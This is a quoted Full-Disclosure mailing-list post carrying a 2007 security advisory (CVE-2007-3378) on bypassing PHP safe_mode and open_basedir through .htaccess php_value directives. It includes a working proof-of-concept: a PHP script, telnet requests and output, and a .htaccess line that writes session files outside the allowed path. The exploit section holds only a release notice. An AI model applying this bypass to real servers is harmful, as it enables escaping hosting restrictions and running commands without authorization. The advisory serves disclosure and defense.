Thread-topic: PHP 5.2.3 PHP 4.4.7,htaccess safemode and open_basedir Bypass Vulnerability
> -----Original Message-----
> From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx
> [mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf
> Of Maksymilian Arciemowicz
> Sent: Friday, July 13, 2007 1:38 PM
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Subject: [Full-disclosure] PHP 5.2.3 PHP 4.4.7,htaccess
> safemode and open_basedir Bypass Vulnerability
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Source:
>
> - -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> [PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass
> Vulnerability ]
>
> Author: Maksymilian Arciemowicz (cXIb8O3)
> SecurityReason
> Date:
> - - - Written: 10.02.2007
> - - - Public: 27.06.2007
>
> SecurityReason Research
> SecurityAlert Id: 45
>
> CVE: CVE-2007-3378
> SecurityRisk: High
>
> Affected Software: PHP <= 5.2.3 , PHP <= 4.4.7
> Advisory URL:
> Vendor:
>
> - - --- 0.Description ---
>
> PHP is an HTML-embedded scripting language. Much of its
> syntax is borrowed
> from C, Java and Perl with a couple of unique PHP-specific
> features thrown
> in. The goal of the language is to allow web developers to
> write dynamically
> generated pages quickly.
>
> When using PHP as an Apache module, you can also change the
> configuration
> settings using directives in Apache configuration files (e.g.
> httpd.conf)
> and .htaccess files. You will need "AllowOverride Options" or
> "AllowOverride
> All" privileges to do so.
>
>
> php_value name value
>
> Sets the value of the specified directive. Can be used only with
> PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a
> previously set
> value use none as the value.
>
> Note: Don't use php_value to set boolean values.
> php_flag (see below)
> should be used instead.
>
> php_flag name on|off
>
> Used to set a boolean configuration directive. Can be
> used only with
> PHP_INI_ALL and PHP_INI_PERDIR type directives.
>
> mail.force_extra_parameters - Force the addition of the specified
> parameters to be passed as extra parameters to the sendmail
> binary. These
> parameters will always replace the value of the 5th parameter
> to mail(), even
> in safe mode
>
>
>
> - - --- 1. htaccess safemode and open_basedir Bypass Vulnerability ---
>
> When using PHP as an Apache module, you can also change the
> configuration
> settings using directives in .htaccess file. These options
> are used by a lot
> of users to change permissions options like display_errors
> etc. But it is
> possible to bypass a safe_mode or open_basedir in different
> functions.For
> example you can set session.save_path via .htaccess. In function
> session_save_path() and ini_set() save_path is checked for
> safe_mode and
> open_basedir. In .htaccess it is bypassed. Values from
> .htaccess are not
> checked.
>
> For example:
>
> cxib# ls -la /www/cxib/
> total 14
> drwxr-xr-x 3 cxib www 512 Feb 16 20:20 .
> drwxr-xr-x 11 www www 7168 Feb 16 20:07 ..
> - - -rw-r--r-- 1 cxib www 53 Feb 16 20:19 stars.php
> drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps
> cxib# cat /www/cxib/stars.php
> <?php
> session_save_path("/inne");
> session_start();
> ?>
> cxib# telnet 0 80
> Trying 0.0.0.0...
> Connected to 0.
> Escape character is '^]'.
> GET /cxib/stars.php HTTP/1.1
> Host: localhost
>
> HTTP/1.1 200 OK
> Date: Fri, 16 Feb 2007 19:22:58 GMT
> Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4
> OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1
> X-Powered-By: PHP/5.2.1
> Content-Length: 732
> Content-Type: text/html
>
> <br />
> <b>Warning</b>: session_save_path() [<a
> href='function.session-save-path'>function.session-save-path</a>]:
> open_basedir restriction in effect. File(/inne) is not within
> the allowed
> path(s): (/www) in <b>/www/cxib/stars.php</b> on line <b>2</b><br />
> <br />
> <b>Warning</b>: session_start() [<a
> href='function.session-start'>function.session-start</a>]:
> open_basedir
> restriction in effect. File(/var/tmp/) is not within the
> allowed path(s):
> (/www) in <b>/www/cxib/stars.php</b> on line <b>3</b><br />
> <br />
> <b>Fatal error</b>: session_start() [<a
> href='function.session-start'>function.session-start</a&
> gt;]: Failed to
> initialize storage module: files (path: ) in
> <b>/www/cxib/stars.php</b> on
> line <b>3</b><br />
>
> Connection closed by foreign host.
> cxib#
>
> So we can't create session in directory. But when we create file
> .htaccess, we can
> write there:
>
> - - ---
> php_value session.save_path /inne
> - - ---
>
> cxib# ls -la /www/cxib/
> total 16
> drwxr-xr-x 3 cxib www 512 Feb 16 20:26 .
> drwxr-xr-x 11 www www 7168 Feb 16 20:26 ..
> - - -rw-r--r-- 1 cxib www 34 Feb 16 20:26 .htaccess
> - - -rw-r--r-- 1 cxib www 53 Feb 16 20:19 stars.php
> drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps
> cxib# cat /www/cxib/.htaccess
> php_value session.save_path /inne
> cxib# cat /www/cxib/stars.php
> <?php
> session_start();
> ?>
>
> We can't set session.save_path via ini_set() or session_save_path().
> Let's try sending a request.
>
> cxib# telnet 0 80
> Trying 0.0.0.0...
> Connected to 0.
> Escape character is '^]'.
> GET /cxib/stars.php HTTP/1.1
> Host: localhost
>
> HTTP/1.1 200 OK
> Date: Fri, 16 Feb 2007 19:30:42 GMT
> Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4
> OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1
> X-Powered-By: PHP/5.2.1
> Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/
> Expires: Thu, 19 Nov 1981 08:52:00 GMT
> Cache-Control: no-store, no-cache, must-revalidate,
> post-check=0, pre-check=0
> Pragma: no-cache
> Content-Length: 0
> Content-Type: text/html
>
> Connection closed by foreign host.
> cxib#
> cxib# ls -la /inne
> total 3
> drwxrwxrwx 2 root wheel 512 Feb 16 20:30 .
> drwxr-xr-x 24 root wheel 1024 Feb 16 20:05 ..
> - - -rw------- 1 www wheel 0 Feb 16 20:30
> sess_45cae9284f2f8b7cb05ce96021c9bf4e
>
> Open_basedir and safe_mode are bypassed.
> Same problem is in error_log and probably in other functions.
>
> This issue allows attacker to bypass disabled_functions like
> system, exec etc.
> We have contacted with Stefan Esser to verify this issue, big
> thanks for him.
> In PHP 5.2.3 it is possible to execute command using exploit
> if mail()
> function is allowed.
>
> - - --- 2. Exploit ---
>
> !WARNING!
> This exploit will be public on 29.06.2007
>
> Tested on: PHP 5.2.3 FreeBSD 6.2.
> PHP 5.2.3 OpenBSD 4.1
>
> Only for PHP5:
>
>
> - - --- 3. How to fix ---
>
> This bug has been founded on February 2007
> We are still awaiting for reply from PHP Team.
>
> - - --- 4. Greets ---
>
> For: sp3x, Infospec p_e_a, l5x, pi3 and Stefan Esser
>
> - - --- 5. Contact ---
>
> Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
> Email: cxib [at] securityreason [dot] com
> GPG:
>
> - -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.5 (FreeBSD)
>
> iD8DBQFGlsRe3Ke13X/fTO4RAqCPAJ9PGzk1l53YdU7oQ2daSqV7umS4FwCfZLqg
> 0gL56QwGpildJBh98c6KzcQ=
> =6q2T
> - -----END PGP SIGNATURE-----
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.5 (FreeBSD)
>
> iD8DBQFGl0hd3Ke13X/fTO4RAoMuAJ9DIBZ9U0WqjmJ0p+h3oeGfA9CgZgCgop9B
> XvgpBQ7WI6z9wgLYPenazNU=
> =i66z
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> Hosted and sponsored by Secunia -
>
